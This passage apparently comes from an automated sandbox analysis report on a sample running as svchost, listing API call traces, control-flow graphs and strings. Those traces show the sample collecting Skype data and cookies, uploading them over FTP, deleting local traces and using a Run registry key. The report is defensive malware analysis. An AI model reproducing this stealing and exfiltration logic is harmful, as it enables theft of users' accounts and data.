      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(?), ref: 006729A8
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(?), ref: 006729CB
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90(?), ref: 006729FB
      • FindNextFileA.KERNEL32(00000000,?), ref: 00672A12
      • FindNextFileA.KERNEL32(?,?), ref: 00672A2D
      • FindClose.KERNEL32(00000000), ref: 00672A40
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ), ref: 00672A52
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00672A67
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,v_%d,FFFFFFFF,00000000), ref: 00672A82
      • sprintf.MSVCR90 ref: 00672A89
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 00672AA2
      • FtpCreateDirectoryA.WININET(00000000,00000000), ref: 00672AB6
      • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(\skype,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 00672ABF
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?), ref: 00672AD1
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00672AE3
      • FtpCreateDirectoryA.WININET(00000000,00000000), ref: 00672AF0
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ), ref: 00672B3B
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90 ref: 00672B51
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000), ref: 00672B61
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,%s\%s,00000000), ref: 00672B76
      • sprintf.MSVCR90 ref: 00672B7D
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,?,?,?,00000000), ref: 00672B96
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,?,00000000), ref: 00672BB3
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,?,?,?,00000000), ref: 00672BC9
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,?,00000000), ref: 00672BE6
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,?,?,?,00000000), ref: 00672BF5
      • FtpCreateDirectoryA.WININET(00000000,00000000), ref: 00672C03
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.2839141968.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000001.00000002.2839102079.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839178588.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839211875.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839245070.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_670000_svchost.jbxd
      Similarity
      • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$A?$basic_string@$V01@$??1?$basic_string@$??$?D@1@@std@@D@2@@0@V10@V?$basic_string@$??4?$basic_string@$??0?$basic_string@FindV01@@$File$CreateDirectoryNextY?$basic_string@$?erase@?$basic_string@V12@sprintf$CloseFirstMessageSend
      • String ID: $ $%s\%s$-$Skype$Software\Microsoft\Windows\CurrentVersion\Run\$\skype$a$m$v_%d
      • API String ID: 970326703-3013915691
      • Opcode ID: dab75c9687abd72509e092ae575046c628990c26bb4811981924ff2e1da17b6b
      • Instruction ID: c1f549650d11e63609f74c269078daef78753a16952c09385b1d9ed496bf2d14
      • Opcode Fuzzy Hash: dab75c9687abd72509e092ae575046c628990c26bb4811981924ff2e1da17b6b
      • Instruction Fuzzy Hash: 08127B711087819FD728DB64DD59BEF7BAABB94305F00990CF58E832A1EB705588CF62

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 484 673b90-673c19 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 485 673c47-673c64 484->485 486 673c1b 484->486 488 673e27-673e4a ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 FtpGetFileA 485->488 489 673c6a-673c85 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpGetFileA 485->489 487 673c20-673c45 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 486->487 487->485 487->487 490 673e50-673eaf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fopen * 2 memset ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 488->490 491 6740e9-67415e fopen fprintf * 3 fclose ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpPutFileA DeleteFileA 488->491 492 674164-6741a0 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ call 674bfc 489->492 493 673c8b-673cf0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fopen * 2 memset ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 489->493 494 673eb5-673ec3 fgetc 490->494 491->492 496 673cf6-673d03 fgetc 493->496 497 674033-674037 494->497 498 673ec9-673eeb ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 494->498 500 673d94-673d98 496->500 501 673d09-673d2b ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 496->501 503 674038-674046 feof 497->503 504 673f4e-673f61 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 498->504 505 673eed-673f26 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 6712f0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6736a0 498->505 502 673d99-673da6 feof 500->502 506 673d5f-673d7a ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fprintf 501->506 507 673d2d-673d5d ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6736a0 fprintf 501->507 502->496 508 673dac-673e22 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fprintf fclose * 2 FtpPutFileA ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z DeleteFileA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 502->508 503->494 509 67404c-6740e7 fprintf * 3 fclose * 2 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpPutFileA ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z DeleteFileA * 2 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 503->509 512 673fa5-673fb8 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 504->512 513 673f63-673f85 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6736a0 504->513 515 67401c-674031 memset 505->515 528 673f2c-673f2e 505->528 514 673d7d-673d92 memset 506->514 507->514 508->492 509->492 512->515 516 673fba-673ff3 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 6712f0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6736a0 512->516 513->515 523 673f8b-673fa3 call 671480 513->523 514->502 515->503 516->515 532 673ff5-673ff7 516->532 523->515 528->515 531 673f34-673f49 528->531 533 67400e-674019 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 6712f0 531->533 532->515 534 673ff9-674009 532->534 533->515 534->533
      APIs
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ,AED9119B), ref: 00673BD4
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,v_%d\status.txt,FFFFFFFF), ref: 00673BF6
      • sprintf.MSVCR90 ref: 00673BFD
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 00673C10
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001), ref: 00673C2C
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 00673C3C
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000,00000000,00000002,00000000), ref: 00673C6A
      • FtpGetFileA.WININET(00000000,status.txt,00000000), ref: 00673C7D
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00676A00), ref: 00673C97
      • fopen.MSVCR90 ref: 00673CA4
      • fopen.MSVCR90 ref: 00673CB5
      • memset.MSVCR90 ref: 00673CC8
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00673CD6
      • fgetc.MSVCR90 ref: 00673CFC
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(?), ref: 00673D12
      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90(number,00000000), ref: 00673D23
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?), ref: 00673D3B
      • fprintf.MSVCR90 ref: 00673D58
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00673D65
      • fprintf.MSVCR90 ref: 00673D78
      • memset.MSVCR90 ref: 00673D8A
      • feof.MSVCR90 ref: 00673D9F
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00673DB2
      • fprintf.MSVCR90 ref: 00673DC5
      • fclose.MSVCR90 ref: 00673DD4
      • fclose.MSVCR90 ref: 00673DDC
      • FtpPutFileA.WININET(00000000,00676A08,status.txt,00000002,00000000), ref: 00673DF6
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00673E03
      • DeleteFileA.KERNEL32(00000000), ref: 00673E0A
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00673E1C
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000,00000000,00000002,00000000), ref: 00673E27
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000), ref: 00673E34
      • FtpGetFileA.WININET(00000000,00000000), ref: 00673E42
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00676A00), ref: 00673E5C
      • fopen.MSVCR90 ref: 00673E69
      • fopen.MSVCR90 ref: 00673E7A
      • memset.MSVCR90 ref: 00673E8D
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00673E9B
      • fgetc.MSVCR90 ref: 00673EBC
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(?), ref: 00673ED2
      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90(upload skype,00000000), ref: 00673EE3
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?), ref: 00673F11
        • Part of subcall function 006736A0: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90 ref: 006736E2
        • Part of subcall function 006736A0: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(00000000,00000001), ref: 006736FB
        • Part of subcall function 006736A0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(00000000), ref: 00673706
        • Part of subcall function 006736A0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00673717
        • Part of subcall function 006736A0: atoi.MSVCR90(00000000), ref: 0067371E
        • Part of subcall function 006736A0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00673732
        • Part of subcall function 006736A0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00673744
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90(find skype..), ref: 00673EFB
        • Part of subcall function 006712F0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90(?,AED9119B,00000000,00675699,000000FF,00672550,?,?,?,AED9119B), ref: 00671322
        • Part of subcall function 006712F0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(00676268,?,?,?,AED9119B), ref: 00671332
        • Part of subcall function 006712F0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,?,?,?,AED9119B), ref: 0067133F
        • Part of subcall function 006712F0: SendMessageA.USER32(00010404,0000000C,00000000,00000000), ref: 00671351
        • Part of subcall function 006712F0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(?,?,?,AED9119B), ref: 00671363
      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90(version,00000000), ref: 00673F59
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?), ref: 00673F71
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90(data cookie), ref: 0067400E
      • memset.MSVCR90 ref: 00674029
      • feof.MSVCR90 ref: 0067403F
      • fprintf.MSVCR90 ref: 0067405D
      • fprintf.MSVCR90 ref: 0067406B
      • fprintf.MSVCR90 ref: 00674079
      • fclose.MSVCR90 ref: 00674087
      • fclose.MSVCR90 ref: 00674090
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000002,00000000), ref: 0067409F
      • FtpPutFileA.WININET(00000000,00676A08,00000000), ref: 006740B2
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 006740BF
      • DeleteFileA.KERNEL32(00000000), ref: 006740CC
      • DeleteFileA.KERNEL32(00676A08), ref: 006740D3
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 006740E1
      • fopen.MSVCR90 ref: 006740F3
      • fprintf.MSVCR90 ref: 0067410A
      • fprintf.MSVCR90 ref: 00674117
      • fprintf.MSVCR90 ref: 00674125
      • fclose.MSVCR90 ref: 0067412E
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000002,00000000), ref: 00674141
      • FtpPutFileA.WININET(00000000,00676A08,00000000), ref: 00674153
      • DeleteFileA.KERNEL32(00676A08), ref: 0067415E
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00674173
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.2839141968.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000001.00000002.2839102079.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839178588.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839211875.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839245070.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_670000_svchost.jbxd
      Similarity
      • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$A?$basic_string@$??0?$basic_string@Filefprintf$??1?$basic_string@$V01@@fclosefopen$?find@?$basic_string@DeleteV01@memset$??4?$basic_string@?erase@?$basic_string@V12@Y?$basic_string@feoffgetc$MessageSendatoisprintf
      • String ID: $%s$data cookie$data skype$find cookie..$find skype..$number$number=%d$status.txt$upload cookie$upload cookie= $upload skype$upload skype= $v_%d\status.txt$version$version=
      • API String ID: 1209982451-2510806938
      • Opcode ID: fbd5d7bce65fc5821ac64849ab4981336d7edb90dab64a2cb41f7d2dd82a8282
      • Instruction ID: b96c748d8815765496898fa910f1313b909cc70b53913a64d2ab7a616a18cbc0
      • Opcode Fuzzy Hash: fbd5d7bce65fc5821ac64849ab4981336d7edb90dab64a2cb41f7d2dd82a8282
      • Instruction Fuzzy Hash: 4FF1D071654B00EFD318EF74DD4EB6A3BABEB44704F009419F54E932A1DBB5A884CB62

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 537 671cb0-671d58 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf call 671260 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpGetFileA 540 672096-6721a0 fopen ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fprintf * 9 fclose ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpPutFileA 537->540 541 671d5e-671e49 memset ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ fopen * 2 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fprintf * 5 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 537->541 544 6721a6-6721ed DeleteFileA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ call 674bfc 540->544 542 671e80-671e90 fgetc 541->542 543 671e4b 541->543 545 671e96-671ec0 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 542->545 546 671f2f-671f33 542->546 547 671e50-671e75 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 543->547 549 671ec6-671ed9 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 545->549 550 671f4b-671fb2 fprintf * 2 545->550 551 671f34-671f40 feof 546->551 547->547 552 671e77 547->552 554 671fb4-672019 fprintf * 2 549->554 555 671edf-671ee4 549->555 556 67201a-67202d fprintf * 2 550->556 551->542 557 671f46 551->557 552->542 554->556 558 671ee6-671efb ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fprintf 555->558 559 671efe-671f11 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 555->559 560 672030-672091 fclose * 2 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpPutFileA DeleteFileA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 556->560 557->560 558->559 561 671f13 559->561 562 671f18-671f2d memset 559->562 560->544 561->562 562->551
      APIs
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ,AED9119B), ref: 00671CF4
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,v_%d\info.txt,FFFFFFFF,?), ref: 00671D1A
      • sprintf.MSVCR90 ref: 00671D27
        • Part of subcall function 00671260: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,00672A9E,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 00671267
        • Part of subcall function 00671260: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 0067127B
        • Part of subcall function 00671260: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 00671288
        • Part of subcall function 00671260: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 0067129C
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,006763D4,00000000,00000000,00000002,00000000), ref: 00671D42
      • FtpGetFileA.WININET(00000000,00000000), ref: 00671D50
      • memset.MSVCR90 ref: 00671D69
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00671D75
      • fopen.MSVCR90 ref: 00671D97
      • fopen.MSVCR90 ref: 00671DA7
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00671DB4
      • fprintf.MSVCR90 ref: 00671DC7
      • fprintf.MSVCR90 ref: 00671DD7
      • fprintf.MSVCR90 ref: 00671DE7
      • fprintf.MSVCR90 ref: 00671DF5
      • fprintf.MSVCR90 ref: 00671DFD
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ), ref: 00671E0B
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,start=%d,?), ref: 00671E2A
      • sprintf.MSVCR90 ref: 00671E31
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 00671E40
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001), ref: 00671E5C
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 00671E6C
      • fgetc.MSVCR90 ref: 00671E85
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(?), ref: 00671E9F
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000), ref: 00671EAD
      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90(00000000), ref: 00671EB8
      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90(</info>,00000000), ref: 00671ED1
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00671EEC
      • fprintf.MSVCR90 ref: 00671EF9
      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90(<info>,00000000), ref: 00671F09
      • memset.MSVCR90 ref: 00671F25
      • feof.MSVCR90 ref: 00671F35
      • fprintf.MSVCR90 ref: 00671F58
      • fprintf.MSVCR90 ref: 00671F88
      • fprintf.MSVCR90 ref: 00672020
      • fprintf.MSVCR90 ref: 0067202B
      • fclose.MSVCR90 ref: 00672037
      • fclose.MSVCR90 ref: 0067203A
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000002,00000000), ref: 00672049
      • FtpPutFileA.WININET(00000000,nf2,00000000), ref: 0067205C
      • DeleteFileA.KERNEL32(nf2), ref: 00672067
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00672079
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 0067208B
      • fopen.MSVCR90 ref: 006720A0
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 006720B1
      • fprintf.MSVCR90 ref: 006720C4
      • fprintf.MSVCR90 ref: 006720D4
      • fprintf.MSVCR90 ref: 006720E4
      • fprintf.MSVCR90 ref: 006720F3
      • fprintf.MSVCR90 ref: 006720FB
      • fprintf.MSVCR90 ref: 00672109
      • fprintf.MSVCR90 ref: 0067213C
      • fprintf.MSVCR90 ref: 0067216C
      • fprintf.MSVCR90 ref: 00672174
      • fclose.MSVCR90 ref: 0067217A
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000002,00000000), ref: 0067218D
      • FtpPutFileA.WININET(00000000,006763D4,00000000), ref: 006721A0
      • DeleteFileA.KERNEL32(006763D4), ref: 006721AB
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 006721C0
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.2839141968.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000001.00000002.2839102079.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839178588.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839211875.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839245070.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_670000_svchost.jbxd
      Similarity
